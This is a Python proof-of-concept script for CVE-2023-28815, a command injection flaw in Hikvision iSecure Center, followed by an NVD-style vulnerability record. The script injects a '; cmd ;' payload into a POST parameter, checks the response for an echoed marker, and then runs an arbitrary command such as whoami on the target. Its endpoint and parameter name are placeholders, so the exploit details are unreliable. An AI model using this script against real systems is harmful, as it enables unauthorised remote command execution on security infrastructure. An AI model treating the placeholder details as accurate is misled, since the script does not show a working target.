CVE-2023-28815

# CVE-2023-28815 - Hikvision iSecure Center Command Injection PoC # Vulnerability: Insufficient parameter validation leading to command injection # CVSS: 9.8 (Critical) import requests import sys TARGET_URL = "http://target-host:port" # The vulnerable endpoint typically accepts parameters that are passed to system commands # without proper sanitization def exploit(target_url, cmd): """ Exploit the command injection vulnerability in Hikvision iSecure Center. The vulnerability exists due to insufficient parameter validation, allowing attackers to inject arbitrary OS commands. """ # Example injection payload using command separator # The vulnerable parameter is typically processed in a system() or exec() call payload = f"; {cmd} ;" headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } # Adjust the endpoint and parameter name based on the specific vulnerable version endpoint = f"{target_url}/svm/api/v1/..." # Example endpoint placeholder data = { "param1": payload, # Replace with actual vulnerable parameter name } try: response = requests.post(endpoint, data=data, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return response except Exception as e: print(f"[-] Error: {e}") return None def check_vulnerability(target_url): """Check if the target is vulnerable by injecting a benign command.""" # Use time-based detection or echo-based detection test_cmd = "echo VULNERABLE_CVE_2023_28815" response = exploit(target_url, test_cmd) if response and "VULNERABLE_CVE_2023_28815" in response.text: print("[+] Target is VULNERABLE to CVE-2023-28815") return True return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [command]") print(f"Example: {sys.argv[0]} http://192.168.1.100:8080 'whoami'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "whoami" if check_vulnerability(target): print(f"[*] Executing command: {command}") exploit(target, command)

{"cve": {"id": "CVE-2023-28815", "sourceIdentifier": "[email protected]", "published": "2025-10-17T12:15:37.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Some versions of Hikvision's iSecure Center Product contain insufficient parameter validation, resulting in a command injection vulnerability. Attackers may exploit this to gain platform privileges and execute arbitrary commands on the system.iSecure Center is software released for China's domestic market only, with no overseas release."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-141"}]}], "references": [{"url": "https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/2023-04/", "source": "[email protected]"}]}}